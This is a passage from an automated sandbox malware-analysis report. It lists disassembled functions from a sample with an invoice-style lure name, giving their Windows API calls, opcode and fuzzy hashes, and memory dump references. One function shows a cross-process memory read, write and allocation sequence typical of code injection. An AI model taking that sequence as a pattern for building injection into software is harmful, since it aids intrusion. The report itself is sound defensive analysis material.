                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                        Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 4023252218-0
                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                        Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                        • String ID:
                                                        • API String ID: 1489400265-0
                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                        Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                        • String ID:
                                                        • API String ID: 1042038666-0
                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                        Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                        Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041780F
                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                        • __getptd.LIBCMT ref: 00417826
                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                        • __lock.LIBCMT ref: 00417844
                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                        • String ID:
                                                        • API String ID: 938513278-0
                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                        Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 2403457894-0
                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                        Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                        • __freefls@4.LIBCMT ref: 00415209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 4247068974-0
                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                        Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 5$8$^
                                                        • API String ID: 0-3622883839
                                                        • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                        • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                        • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                        • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                        Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )$U$\
                                                        • API String ID: 0-3705770531
                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                        Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                        Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 708495834-557222456
                                                        • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                        • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                        Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                        Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \$]$h
                                                        • API String ID: 4104443479-3262404753
                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
